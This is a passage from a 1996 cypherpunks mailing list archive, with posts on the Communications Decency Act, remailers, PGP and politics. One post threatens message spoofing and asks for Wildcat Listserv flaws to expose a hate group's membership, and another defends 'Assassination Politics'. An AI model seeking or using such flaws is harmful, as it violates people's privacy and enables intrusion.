her congresscritter is wasting time and helping to promote an
impression of the net as a place full of immature, unrealistic people.

Find something original and concrete to do instead.  Spend the five 
minutes writing and *mailing* an original letter to your elected
official and mention you are in his or her district.   Write a
non-judgemental, helpful explanation of something to a net newcomer.
Install PGP on your roomate's machine and teach him/her how to use
it. Take an hour to write and post a refutation to a meme which 
you think will harm the net community.  Just go DO something.

It's a hard thing to face, that armed persons might come to your door
and shut down your livelihood and your main access to your chosen
community of friends, and possibly shoot you or your loved ones in 
the process.  The sooner we face and deal with that fear in ourselves,
and use that transformative power to direct our actions for individual
and collective freedom, the better.  Pretending we are ruling a
powerful invisible empire which is immune to violence is not the way
to get there.  Get real about the virtual.

2/11/96

M. Strata Rose
strata@virtual.net

Copyright 1996 M. Strata Rose.  This message may be forwarded in its
entirety as long as this notice is retained.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBtAzDquVEAAAEDAJzWZyzHAO92FpvwUFrGNk3LCHRsTu4BT+scMw/3CdJtWoCB
9HGoj8N/4jLE0kjJH+2iNT0nvfHCjJbd7s1wXUbKcjoJBi6+mUJIe+mjyyjMxuyz
ulM1UdqyunAFqCBz1QAFEbQjTS4gU3RyYXRhIFJvc2UgPHN0cmF0YUB2aXJ0dWFs
Lm5ldD4=
=x64T
-----END PGP PUBLIC KEY BLOCK-----
*************************************************************************
M. Strata Rose                                  strata@virtual.net
VirtualNet Consulting                		408-534-3714
Unix & Internet Administration since 1983       http://www.virtual.net/
             ***   Better Business Bureau member ***
*************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 12 Feb 1996 05:41:01 +0800
To: cypherpunks@toad.com
Subject: internet underground www address
Message-ID: <199602112120.NAA03191@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


my apologies-- I should have included this.

the web site for the internet underground magazine I mentioned
is 

http://www.nuke.com/underground.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 12 Feb 1996 03:18:23 +0800
To: cypherpunks@toad.com
Subject: NON_ice
Message-ID: <199602111842.NAA08358@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Fueling Asia-phobia of techno-insurrection, The Wash Post
   today offers opposing views of Singapore:

   "City of the Future: What American Can Learn form Post-
   Liberal Singapore;" and,

   "Big Brother's Hometown: The Country is a Model, All Right
   -- of Dressed-Up Dictatorship."

   The first sets out the virtues of paternalism, and quotes
   eminently powerful Lee Kuan Yew, "The ideas of individual
   supremacy and the right to free expression, when carried to
   excess, have not worked. They have made it difficult to
   keep American society cohesive. Asia can see it is not
   working. ... The top 3 to 5 percent of a society can handle
   this free-for-all, this clash of ideas. If you do this with
   the whole mass, you'll have a mess. In this vein, I say,
   let them have the Internet."

   In the second, Lee's own OCAF Agincourt Project is detailed,
   "I would isolate the leaders, the trouble-makers, get them
   exposed, cut them down to size, ridicule them, so that
   everybody understands that it's not such a clever thing to
   do. Governing does not mean just being pleasant. If you
   want a pleasant result, just as with children, you cannot
   just be pleasant and nice."


   Then there is "Angry, White Rebels are Homeless by Choice,"
   a Page One jaw-dropper about "gutter punks," scion Okies of
   all America's families:

      Their appearance and their life-style seem like a
      nightmare to many of their parents and much of society,
      as if all the promise of youth in America had been
      turned inside out, producing these nihilistic, angry,
      ironic spawn all dressed in black, the end result --
      perhaps a bill coming due -- of decades of family
      disintegration, suburban boredom and national cynicism.

      Filth has stitched the anarchist patch into the palm of
      his hand. "Crusty punks" never bathe and say the police
      cannot make an arrest because of body odor. "I'm a paint
      head," said Riff Raff, inhaling spray paint. Becca said,
      "People are afraid of us, but we're not the ones who are
      scary." 

   Only for the beyond-Singapore, truly loving parent.


   NON_ice (for all)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 12 Feb 1996 05:06:53 +0800
To: cypherpunks@toad.com
Subject: Re: Strange Sounds of Silence
Message-ID: <ad43940d490210041702@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I rarely understand the points "tallpaul" makes, but this one is especially
confusing to me:

At 7:59 PM 2/11/96, tallpaul wrote:

>I do seem to observe strange sounds of silence from lib'bers on the
>cypherpunks list about the legislative body who passed the law, although
>they must know about the law since they blast the "libera;" to "socialist
>statist" President who signed it.
>
>I seem to observe similar sounds of silence from people who get upset at
>ostensibly liberal Tipper Gore's godlike powers to implement, as a single
>individual, some form of record labels while remaining silent about the
>conservative forces supporting Gingrich clustered around fundamentalist
>christianity who were calling for censorhip.

As a card-carrying "lib'ber," it seems to me that I have written more than
enough articles denouncing the CDA, making fun of it and Congress, etc. And
so have numeous other "lib'bers" on this list, including (but not limited
to) Bill Stewart, Duncan Frissell, Jim Ray, Rich Graves, Sandy Sandfort,
Vince Cate, and others too numerous to mention.

tallpaul must be reading a different list than I am reading if thinks those
he dismisses as "lib'bers" (in his other posts, and this one) are somehow
in league with the Christian Right in supporting censorship.

--Tim May

[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should fuck him." So the two daughters got him drunk and
screwed him all that night. Sure enough, Dad got them pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents,
your pet dog, or the farm animals, unless God tells you to. [excerpts from
the Old Testament, Modern Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 12 Feb 1996 07:00:02 +0800
To: cypherpunks@toad.com
Subject: Re: Regulation of citizen-alien communications (Was: Choices)
In-Reply-To: <ad436a62470210044ce3@[205.199.118.202]>
Message-ID: <0Hg6iD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> At 1:01 PM 2/11/96, Dr. Dimitri Vulis wrote:
>
> >As I read it, a college professor might get busted for explaining his own ne
> >crypto research to a class where some students happen not to be U.S. citizen
>
> Considering that most engineering and computer science classses are
> approaching 50 percent non-U.S.-citizen, and considering that no such
> professors have yet been busted, I'm inclined to think this is a
> non-threat.
>
> (Indeed, it's a _potential_ threat, and one we should bear in mind, but it
> seems likely that no such prosecutions have occurred or will occur.)

I have anecdotal evidence (which I don't want to share) that certain college
teachers are reluctant to discuss state-of-the art crypto research in class
because they feel they're not supposed to share it with foreign students. It
may not be a fear of prosecution as much as the belief that it's against the
intent of the laws.

> >Of course we all know this already. Just some U.S. people prefer to ignore t
> >mote in their own eye and to fight censorship in exotic remote developing
> >countries. Do you remember how U.S. Gov't tried to prevent the publications
> >research papers on zero-knowledge proofs?
>
> No, could you provide some details? Who was pressured? Micali? Goldwasser?
> Rackoff? Please share the details.
>
> There has been an ineffective "voluntary review" process for academic
> researchers, and perhaps this is what Dimitri is referring to. But this did
> not stop the publication of the ZKIPS work a decade or so ago.

I recall that the (in)voluntary review process did slow down the publication of
ZKP by a year or so. Rather than rely on my memory, I'll dig up the exact
details and will most definitely get back to you.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Mon, 12 Feb 1996 04:41:01 +0800
To: cypherpunks@toad.com
Subject: Re: Strange Sounds of Silence
Message-ID: <199602111959.OAA19274@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> 
>Alan Pugh writes: 
>> Has anyone else out there noticed the strange sounds of silence 
>> emmanating from the american print and broadcast media concerning the 
>> rider attached to the Telecommunications Act recently signed by 
>> President Clinton known as the CDA (Communications Decency Act)? 
> 
 
No, actually I haven't. 
 
I do seem to observe strange sounds of silence from lib'bers on the
cypherpunks list about the legislative body who passed the law, although
they must know about the law since they blast the "libera;" to "socialist
statist" President who signed it. 
 
I seem to observe similar sounds of silence from people who get upset at
ostensibly liberal Tipper Gore's godlike powers to implement, as a single
individual, some form of record labels while remaining silent about the
conservative forces supporting Gingrich clustered around fundamentalist
christianity who were calling for censorhip. 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 12 Feb 1996 04:37:08 +0800
To: John Young <cypherpunks@toad.com
Subject: NON_ice
Message-ID: <ad43b67a01021004f7ec@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


Thanks.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 12 Feb 1996 07:42:53 +0800
To: cypherpunks@toad.com
Subject: Lib'ber authentication
In-Reply-To: <ad43940d490210041702@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.960211151032.23333I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 11 Feb 1996, Timothy C. May wrote:

> I rarely understand the points "tallpaul" makes, but this one is especially
> confusing to me:
> 
> At 7:59 PM 2/11/96, tallpaul wrote:
...
> >I seem to observe similar sounds of silence from people who get upset at
> >ostensibly liberal Tipper Gore's godlike powers to implement, as a single
> >individual, some form of record labels while remaining silent about the
> >conservative forces supporting Gingrich clustered around fundamentalist
> >christianity who were calling for censorhip.
> 
> As a card-carrying "lib'ber," it seems to me that I have written more than
> enough articles denouncing the CDA, making fun of it and Congress, etc. And
> so have numeous other "lib'bers" on this list, including (but not limited
> to) Bill Stewart, Duncan Frissell, Jim Ray, Rich Graves, Sandy Sandfort,
                                              ^^^^^^^^^^^
Hey! I'm not a lib'ber! I'm a FUCKING STATIST, and (on other lists) maybe
even a CRYPTO-JEW! 

-rich
 Institute for Ernst Zundel Revisionism
 http://36.190.0.210/~llurch/Not_By_Me_Not_My_Views/
 "First, bring down Zundel's suffering in terms of numbers and
 events, both real and imagined, to what it really was, not what
 they say it was, what they exploit for their own political,
 financial, and geopolitical purposes."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leslie Todd Masco <cactus@hks.net>
Date: Mon, 12 Feb 1996 04:55:39 +0800
To: cypherpunks@toad.com
Subject: Coderpunks archives on line
Message-ID: <199602112032.PAA16583@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I've placed the coderpunks archives up for viewing, reachable from the same
page as the cypherpunks archives ( http://www.hks.net/cpunks/ )
- --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMR5SUioZzwIn1bdtAQEpLQF/e4UQxQv4+XGwCt/wNQuCLtyFhfiJLyTF
8+oIS/+B2Ntp43+8xKIB36wcMhvC0vTE
=y1HW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin.berry@chrysalis.org
Date: Mon, 12 Feb 1996 06:34:07 +0800
To: cypherpunks@toad.com
Subject: STRANGE SOUNDS OF SI
Message-ID: <9602111604.0ML4D03@chrysalis.org>
MIME-Version: 1.0
Content-Type: text/plain



 * Carbons sent to: Ses@tipper.oit.unc.edu

CC: cypherpunks@toad.com
-=> Quoting Ses@tipper.oit.unc.edu to Kevin Berry <=-

 > The Strange Sounds of Silence
 > 
 > Has anyone else out there noticed the strange sounds of silence
 > emmanating from the american print and broadcast media concerning the
 > rider attached to the Telecommunications Act recently signed by
 > President Clinton known as the CDA (Communications Decency Act)?
 > 

 Se> Are you sure? The coverage has been wall to wall out here (Bay area); 
 Se> front page above the fold, business pages, computer columns,
 Se> editorials  and editorial cartoons. Apparently it's the same level of
 Se> coverage back  in the RTP.

 Se> What part of the country are you in? I guess the coverage is different
 Se> in the major geek zones like the bay area and RTP

I know that in the Dallas/Fort Worth, Texas area, there has been no coverage
whatsoever.

[Using PGPWave 1.22a Beta. This message written on 2/11/1996 at 14:34:56.]

... If it works, rip it apart and find out why!
___ Blue Wave/DOS v2.21 [NR]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 12 Feb 1996 15:00:52 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <m0tllpL-00091qC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:54 AM 2/11/96 -0500, John Young wrote:
>It's hard to tell the difference between "Assasination 
>Politics" and government-sponsored provocateurism, a 
>well-documented practice to stigmatize anarchical and 
>anti-authoritarian ventures.

I deeply appreciate your quandary.

Needless to say, _I_ know which I am, and what my motivations are.  But 
there are a few clues which might assist you:

1.  Most "government sponsored provocateurism" is given substantially more 
publicity than the meager amount I've managed to acquire on FIDOnet, USENET, 
and CP.  You can well imagine that if the government were trying to use an 
"Assassination Politics"-type scenario to drum up support for Clipper-type 
and FBI-wiretap ideas, they'd do a better job getting the word out.

2.  I think I've tried to make it clear that I believe that this idea is 
technically inevitable; it will occur REGARDLESS of the efforts which 
attempt to resist it.  If this were "government-sponsored provocateurism,"  
I would have added something to the effect that "This is going to happen 
unless [fill in the blank with something the government wants to do to 
us...]". 

3.  "Watch this space"   If you still have any residual doubts, and think I 
might be in league with the government on this, wait a few months.  You'll 
be astonished.


>However, it takes guts and thick skin to advocate overthrow of 
>authority, knowing that reasonable people will think you're a 
>nut seeking celebrity martyrdom.

Well, it's not like I'm SEEKING martyrdom, but the possibilities have 
certainly crossed my mind. Some people have suggested, and only partially in 
jest, that I may be one of the system's first victims.  They may be right.  
Nevertheless, I was undeterred, as evidenced by the fact that I published 
the essay anyway.


>Happily for the careers of agent-and-anarchist back-stabbing 
>back-scratchers, there is no easy way to know for sure which is 
>which, or even if there's any difference when the media 
>juggernauts are provocateuring both roles for melodramatic 
>infotainment.

My idea has already resulted in an article in the Asahi Evening News 
newspaper, an English-language newspaper for residents of Japan.  A copy of 
this article was mailed to me a couple days ago.  It may also result in a (I 
hope positive) screenplay.  FAR more exciting that "The Net."

Jim Bell

Klaatu Burada Nikto

Something is going to happen.       Something...Wonderful!



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMR6EVfqHVDBboB2dAQH6IgP+MjeXW5l7MxBJxjjFN35Rc6xBS+l924Re
byW467mj3BQ1Iz9g/UBVnleMUBzx+6mseBFZ+aYqjdrzFOMAo/F8Qys9HgD96I1o
TLJ+dziKzpNPj4GmrYhliFaF8sifZgbatEIfnu4WFz1jT6rqxwbkTh49xxz2crjC
JKSskpxXoMA=
=XPh3
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 12 Feb 1996 08:28:49 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Strange Sounds of Silence
In-Reply-To: <ad43940d490210041702@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.960211160455.7170A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 11 Feb 1996, Timothy C. May wrote:

> [tallpaul writes...]
> >I seem to observe similar sounds of silence from people who get upset at
> >ostensibly liberal Tipper Gore's godlike powers to implement, as a single

That's goddess-like.

> As a card-carrying "lib'ber," it seems to me that I have written more than


"lib'ber", eh?  Sounds like libber.a, a common name for libraries 
implementing the basic encoding rules, used in the PCKS and X.509 - 
can someone give me a pointer to where I can find a 
copy of v3 online?

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 12 Feb 1996 08:51:00 +0800
To: cypherpunks@toad.com
Subject: "Helping the clueless" on crypto-privacy: the Zundelhoaxers
Message-ID: <Pine.ULT.3.91.960211155053.23333K-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I seem to have introduced one of the leading white supremacist activists
to PGP and cypherpunk remailers recently, perhaps because of my promise to
archive their mailing list publicly and spoof messages from them if they
didn't. I'm so proud. I assume the ADL and allied organizations will be
learning more about PGP as well. 

  Type bits/keyID    Date       User ID
  pub  1024/C01741A1 1996/02/01 Don Black <dblack@jbx.com>
                     ^^^^^^^^^^
Tom Metzger <metzger@cts.com> and Neo-Nazi straight woman Ingrid Rimland
<ezundel@cts.com> do not yet use PGP, but I'm working on it. 

The message below (Stormfront-L is Don's moderated mailing list for
"Aryan" activists, which can be quite entertaining -- subscription
instructions at tail) has a few technical misconceptions that should
probably be corrected, though of course it would be Bad to cross-pollinate
the lists. 

I've also created and propagated PGP keys for each of Don Black's other
email addresses as a way of teaching him about key identification,
propagation, and signing.

There was an earlier message on Stormfront-L from an alpha.c2.org nym who 
was having trouble. I assume Sameer helped him out.

So anyway, here's the message. I have a few more comments after the
included message. 

- ---------- Forwarded message ----------
Date: Sun, 11 Feb 1996 13:01:02 GMT
From: Stormfront-l <stormfront-l@stormfront.org>
To: llurch@networking.stanford.edu
Subject: Re: a message on Stormfront-L

NOTE: THIS MESSAGE WAS ORIGINALLY ADDRESSED TO DON BLACK

From: Secret Squirrel
Date: Sun, 11 Feb 96 13:01:02 GMT
Subject: Re: a message on Stormfront-L

BTW it is a good idea to sign your own key, as this helps defeat
fraudulent use of your pgp public key. (I don't know how it's done,
but read about the problem on alt.security.pgp). I've signed my key
twice, once with my 1024 and again with my 2048 bit key.

I saw a message on Stormfront-L saying that the 'international
version' was the best PGP system, however this is only for use outside
the USA. It might be best for nationalists in the US to note this in
order to avoid any problems. (It does have 2048 bit security, but
2.6.2 can generate 2047 bits, so it isn't that bad!) Also people
should use a _minimum_ of 1024 bits as smaller numbers have been
'cracked'.

In a message to Stormfront-L re: White Wolf, it was stated that there
was problems posting to that address. I can confirm that there is
interference with the remailers and pseudo-anonymous mailers. I
believe that neither of these systems is secure. In my case I found
that one could subscribe to your list, but the moment one posted to
it, the account was blocked. Further that anonymous messages sent to
the list via a remailer (no a/c) would get through on the first
attempt, but not afterwards. This suggests that the enemy inform the
sysops of the remailers, and subsequently posting is blocked from
those remailers. Further I suspect that the remailers keep 'message in
- - message out' ID logs, which means that (if they take sufficient
interest) a message could be subsquently traced back through a chain
of remailers.

There is a method of finding out where messages come from,
it is called (I believe) 'packet tracing'. It is possible that I've
experienced this with pseudo-anonymous posts to your list. I set up an
account with alpha.c2.org via remailers (they wouldn't know my real
address) however the messages were stripped from your list,
and large numbers of 'packets' of the same size were sent out, i.e. my
reply-block only. These packets can be traced through remailers to an
address (by people with sufficient computing power). Believe me the
enemy is so concerned with the white-nationalist movement, they want
to know exactly who is posting. If you search amongst the web sites
dealing with security, the details of tracing etc. are fully
documented (unfortunately I've lost the addresses due to problems with
my web browser cache).

The use of anon accounts is useful to the sender, however people who
reply will, no doubt, have there addresses recorded   at
alpha.c2.org etc. All mail sent by nationalists to their comrades
should be in PGP, so even if their adds. are recorded the contents
will be (mostly) hidden. Although the anon people may hit back by
blocking the a/c!

The anon server at anon.penet.fi is basically useless for posting to
the alt.nationalism group. All my messages have been returned
'unwanted group'. I've also found that the mail-to-news gateways
won't accept traffic to those groups either. Essentially the enemy has
denied people anonymous access to nationalist usenet groups.

For a short period my ISP blocked direct posting to
alt.politics.nationalism.white, but for some reason this has been
restored.

I hope the above has been of interest to you, and if you wish to
forward the info. to the list etc., please anonymize it.

Regards,

- ------------------------------------------------------------------------
To: Multiple recipients of the Stormfront-L Mailing List
Host: Don Black <dblack@mail.stormfront.org> Finger for PGP public key.
To unsubscribe, send e-mail to 'listserv@stormfront.org' with the
line 'unsubscribe Stormfront-L' in the message BODY, not the subject.
- ------------------------------------------------------------------------

- -----
Processed with Listserv v2.83 for Wildcat v4
- ---------- End Forwarded message ----------

I like Nazis and racists. I want to learn more about them. Where they
live, how they make their money, who they call, and so on. All completely
above-ground, of course. 

By the way, does anyone know of any security deficiencies in this Wildcat 
Listserv software that would allow someone to obtain the list membership?
They seem to be assuming that it's a secret, which IMO is a bad policy. 
They should all move to anonymous remailers or, better, carrier pigeons.
If you know of any sich problems, please send me encrypted mail, and Cc 
Don. Of course, you can't be absolutely sure which key is Don's... Maybe 
you should use the ultra-secure Enigma code instead of PGP.

"Eternal vigilance is the price of liberty."
"We hold these truths to be self-evident..."
"Fight hate speech with more speech."
"To the ends of the earth I will follow thee."
"The pen is mightier than the sword."

- -rich
 Institute for Ernst Zundel Revisionism
 http://36.190.0.210/~llurch/Not_By_Me_Not_My_Views/
 "First, bring down Zundel's suffering in terms of numbers and
 events, both real and imagined, to what it really was, not what
 they say it was, what they exploit for their own political,
 financial, and geopolitical purposes."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMR6AzY3DXUbM57SdAQFPqgP/VUS9aydQjv6kmJc/fbg6exXQRl17RTKb
EaUNftVUZJyMYLpOYg0X/UFH19fpBPQnbw1FFOiOMqSyc3pXtINUMpJZ1mmLI8Ro
ZopVLS01d15cx+nZfVTjVF68eGthDgjKKAPZ/FXsn8/8tQtfq6jZsaDNBldWPjAX
hlWEctOfdKo=
=hck9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz	<alanh@infi.net>
Date: Mon, 12 Feb 1996 06:08:18 +0800
To: cypherpunks@toad.com
Subject: does NSA have jurisdiction over sound-eavesdropping?
Message-ID: <199602112141.QAA07184@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Some conversations can be intercepted as sound waves. Just build a 
sensitive and directional enough microphone. Does NSA have control over that 
mission?  I'm talking about outside the USA.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Mon, 12 Feb 1996 09:27:36 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Strange Sounds of Silence
Message-ID: <v01530501ad443cc3fbe2@[204.179.169.65]>
MIME-Version: 1.0
Content-Type: text/plain


>Alan Pugh writes:
> > Has anyone else out there noticed the strange sounds of silence
> > emmanating from the american print and broadcast media concerning the
> > rider attached to the Telecommunications Act recently signed by
> > President Clinton known as the CDA (Communications Decency Act)?
>
>I always hear it referred to as "provisions which would ban
>pornography on the Internet" or "new laws that prohibit sending
>X-rated materials to children on the Internet".

Same here.  The only dissenting voice was ABC and even then it wasn't the
expose that we would hope for.  I live in Southern California.

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 12 Feb 1996 07:18:20 +0800
To: cypherpunks@toad.com
Subject: Re: Web MIA? (fwd)
Message-ID: <199602112310.RAA02473@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From owner-advanced-sl@list.pitt.edu Sun Feb 11 16:38:21 1996
X-Authentication-Warning: list.srv.cis.pitt.edu: majordom set sender to owner-advanced-sl using -f
Date: Sun, 11 Feb 1996 15:07:53 -0700 (MST)
From: Hundsdorfer Timothy <hundsdor@ucsub.Colorado.EDU>
To: advanced-sl@list.pitt.edu
Subject: Re: Web MIA?
In-Reply-To: <01I134RUAVAQ000IVC@suvax1.stetson.edu>
Message-ID: <Pine.SOL.3.91.960211150617.15918A-100000@ucsub.Colorado.EDU>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-advanced-sl@list.pitt.edu
Precedence: bulk

Rusty and all:

The University has adopted an "academic pages only" policy, so the ASL 
page died a gravy-sucking death.

Both my page and Bahadir's page dying within a month!  It's a freaking 
consipiracy!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: medea@alpha.c2.org (Medea)
Date: Mon, 12 Feb 1996 10:14:53 +0800
To: cypherpunks@toad.com
Subject: Encryption software
Message-ID: <199602120118.RAA22586@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


  I was telling a friend that I was going to buy a program similar to PC Anywhere to be able to communicate between my computer at home and the one at the office.  He suggested trying to find a similar program which includes encryption.
  Anyone know of such a program?
  Thanks.

Medea


============================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ |---------------------------------------------| +
+ | The mind is its own place, and of itself    | +
+ | Can make a heaven of hell, a hell of heaven | +
+ |---------------------------------------------| +
+++++++++++++++++++++++++++++++++++++++++++++++++++









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Mohr <stephan.mohr@uni-tuebingen.de>
Date: Mon, 12 Feb 1996 02:08:52 +0800
To: cypherpunks@toad.com
Subject: A Cyberspace Independence Declaration
Message-ID: <2.2.16.19960211180749.54c7c5f4@mailserv.uni-tuebingen.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I just put J.P. Barlow's 'A Cyberspace Independence Declaration' on my
homepage: http://www.uni-tuebingen.de/uni/sii/sm/indep.htm. There is a
little introduction by M.S. Bilk too.

Stephan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Mon, 12 Feb 1996 07:36:57 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: URLs for Anon remailers?
In-Reply-To: <v0153050dad43b510ec30@[204.179.169.65]>
Message-ID: <199602112312.SAA07028@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


lunaslide writes:
> Anybody got some good URLs for info on anonymous remailers for novices and
> experienced users alike?  I need to know which are which so I can hand them
> out like candy to my .edu friends who aren't _as_ net savvy, but aren't
> dumb as dirt clods either. 

My recommendation:

Coming from the experienced end, start at Raph Levien's
http://kiwi.cs.berkeley.edu/mixmaster-list.html

Coming from the inexperienced end, start at Galactus'
http://www.stack.urc.tue.nl/~galactus/remailers/index-anon.html

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 12 Feb 1996 10:43:54 +0800
To: cypherpunks@toad.com
Subject: Re: "Rights"
Message-ID: <199602120213.SAA04548@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:12 PM 2/10/96 -0500, jf_avon@citenet.net (Jean-Francois Avon (JFA
Technologies, QC, Canada)) wrote:
>Ed.Carp@linux.org, ecarp@netcom.com wrote:
>
>>What happens when there *is* no remedy, when there are no other sites to 
>>go to, when there are no employers who would refrain from violating an 
>>employee's privacy?  What then?
>
>Easy! Either you do not get on the net or you start your own ISP service.
>It might cost money. i.e. requires work, but it is feasible.

Of course, in a market environment, you can do better than that.
Because there are almost always other people who want what you want,
and barring major government interference, there are ways to find them
and usually people interested in offering you and your fellow-travellers 
the service you want.  Most of the time, there are economies of scale
that make it cheaper to get the service together rather than each doing
it yourself, and you can decide whether to do it as a cooperative
or buy it from the vendor who's supporting the bunch of you.

ObCrypto: Even _with_ major government interference, there will be ways
to find your fellow-travellers.  Anonymously.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Mon, 12 Feb 1996 09:27:17 +0800
To: cypherpunks@toad.com
Subject: LI Newsday OpEd: Criminal Justice System
Message-ID: <199602120047.TAA02205@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Found a really good op-ed piece in LI Newsday, Thurs. Feb 8, pA53
by Robert Reno, "If Jails Are Full, How Much Tougher Can Judges Get?"

Some highlights:

  American Jails are more packed with criminals than ever in history.
  We know this for sure because every time we count them, it keeps 
showing the percentage of the population that is in jail has 
